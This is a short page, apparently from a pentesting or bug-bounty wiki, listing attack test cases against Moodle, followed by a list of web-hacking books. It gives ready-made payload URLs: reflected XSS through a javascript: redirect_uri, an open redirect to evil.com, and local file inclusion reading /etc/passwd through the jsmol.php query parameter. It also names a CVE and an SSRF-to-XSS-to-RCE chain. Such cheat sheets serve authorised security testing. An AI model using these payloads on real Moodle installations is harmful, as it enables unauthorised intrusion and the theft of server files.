Moodle
Detection
Source code
<meta name="keywords" content="moodle,
Tests
Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
Open redirect in /mod/lti/auth.php in "redirect_url" parameter
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
Moodle Scanner
CVE-2025-26529
SSRF to XSS - XSS to RCE Moodle
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Last updated